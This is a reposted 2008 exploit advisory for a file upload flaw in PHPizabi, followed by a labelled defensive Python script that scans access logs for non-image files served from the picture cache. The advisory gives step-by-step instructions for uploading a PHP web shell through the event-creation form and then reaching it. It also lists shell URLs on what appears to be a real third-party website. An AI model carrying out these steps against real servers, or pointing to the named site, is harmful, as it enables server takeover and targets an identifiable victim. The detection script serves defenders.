"The Devil Is the Voice Within; Listen to That Voice"

-Zorlu BUĞRAHAN-

Sunday, 7 September 2008

Powered by PHPizabi v0.848b C1 HFP1 remote file upload

Thanks to this vulnerability, we can upload files to the site where the script is installed. Imagine this opportunity falling into the hands of someone with malicious intent. Instead of uploading an image, they could upload a shell and thereby gain privileges on the server.


exploit: http://localhost/izabi/system/cache/pictures/id_shell.php

- First register on the web site.

- Click on create an event (direct create event URL: http://localhost/izabi/?L=events.create )

- Write the event title and description. For "show to", select all the users. Click the Browse button and upload shell.php.
- Afterwards go to the event page. Right-click the uploaded photo, click Properties in the menu, and copy the URL.

example: http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500
and exploit:
http://localhost/izabi/system/cache/pictures/xxx_shell.php
example web site:
http://bitchinindie.com/system/image.php?file=597_shell.php&width=500
exploit shell.php
http://bitchinindie.com/system/cache/pictures/597_shell.php

# milw0rm.com [2008-02-17]
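
A defender's check for the pattern in the advisory above, added here as an example and not part of the original post or of PHPizabi: it scans web-server access-log lines for non-image files requested from the picture cache or passed to image.php. The Combined Log Format, the allowed-extension list and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions the picture cache should ever serve (assumption for this example).
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
# Paths from the advisory; the install prefix (/izabi/) varies per site.
CACHE_DIR = "/system/cache/pictures/"
RESIZER = "/system/image.php"
# Request and status fields of a Common/Combined Log Format line.
REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def has_image_ext(name):
    # Only the final extension counts, so "a.jpg.php" is rejected too.
    base = name.rsplit("/", 1)[-1]
    return "." in base and base.rsplit(".", 1)[1].lower() in IMAGE_EXTS

def classify(line):
    """Return (reason, filename, status) for a suspicious request, else None."""
    m = REQ_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path, status = unquote(url.path), int(m.group("status"))
    if CACHE_DIR in path:
        name = path.split(CACHE_DIR, 1)[1]
        if name and not has_image_ext(name):
            return ("non-image requested from picture cache", name, status)
    if path.endswith(RESIZER):
        for name in parse_qs(url.query).get("file", []):
            if not has_image_ext(name):
                return ("non-image passed to image.php", name, status)
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IPs, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Feb/2008:10:00:01 +0000] "GET /izabi/system/image.php?file=12_cat.jpg&width=500 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Feb/2008:10:02:13 +0000] "GET /izabi/system/image.php?file=41_notes.php&width=500 HTTP/1.1" 200 312',
    '192.0.2.44 - - [17/Feb/2008:10:02:40 +0000] "GET /izabi/system/cache/pictures/41_notes.php HTTP/1.1" 200 1890',
    '192.0.2.10 - - [17/Feb/2008:10:03:00 +0000] "GET /izabi/system/cache/pictures/12_cat.jpg HTTP/1.1" 200 5120',
    '192.0.2.77 - - [17/Feb/2008:10:05:09 +0000] "POST /izabi/system/cache/pictures/41_notes.PHP?x=1 HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for reason, name, status in scan(SAMPLE_LOG):
        print(f"{status} {name}: {reason}")
```

A 200 status on a picture-cache hit means the server found the file, so those entries deserve the first look.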
